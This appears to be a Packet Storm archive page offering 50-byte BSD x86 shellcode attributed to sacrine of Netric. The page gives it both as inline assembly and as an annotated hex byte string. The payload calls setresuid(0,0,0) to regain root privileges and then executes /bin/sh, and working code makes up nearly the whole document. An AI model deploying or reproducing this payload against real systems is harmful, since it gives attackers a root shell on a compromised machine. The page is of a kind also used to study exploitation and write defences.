BSD x86 shellcode (50 bytes) which does setresuid(0,0,0); execve /bin/sh; exit;.
e2bc692fdcbd03b51b8e53749109b8764a10a638eebbe7da7f003debffcdd6ea/* BSD x86 shellcode(50 bytes) by sacrine of Netric (www.netric.org)
* setresuid(0,0,0); execve /bin/sh; exit;
*/
int
main() {
__asm(" xorl %eax,%eax
pushl %eax
pushl %eax
pushl %eax
pushl %eax
movw $0x137, %ax
int $0x80
xorl %eax,%eax
pushl %eax
pushl $0x68732f2f
pushl $0x6e69622f
mov %esp,%ebx
pushl %eax
pushl %esp
pushl %ebx
pushl %eax
movb $0x3b,%al
int $0x80
xorl %eax,%eax
movb $0x1,%al
int $0x80
");
}
*/
char main[]=
// setresuid(0,0,0);
"\x55\x89\xe5\x31\xc0" // xorl %eax,%eax
"\x50" // pushl %eax
"\x50" // pushl %eax
"\x50" // pushl %eax
"\x50" // pushl %eax
"\x66\xb8\x37\x01" // movw $0x137, %ax (setresuid();)
"\xcd\x80" // int $0x80
// execve /bin/sh
"\x31\xc0" // xorl %eax,%eax
"\x50" // pushl %eax
"\x68\x2f\x2f\x73\x68" // pushl $0x68732f2f
"\x68\x2f\x62\x69\x6e" // pushl $0x6e69622f
"\x89\xe3" // mov %esp,%ebx
"\x50" // pushl %eax
"\x54" // pushl %esp
"\x53" // pushl %ebx
"\x50" // pushl %eax
"\xb0\x3b" // movb $0x3b,%al
"\xcd\x80" // int $0x80
// exit();
"\x31\xc0" // xorl %eax,%eax
"\xb0\x01" // movb $0x1,%al
"\xcd\x80"; // int $0x80
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed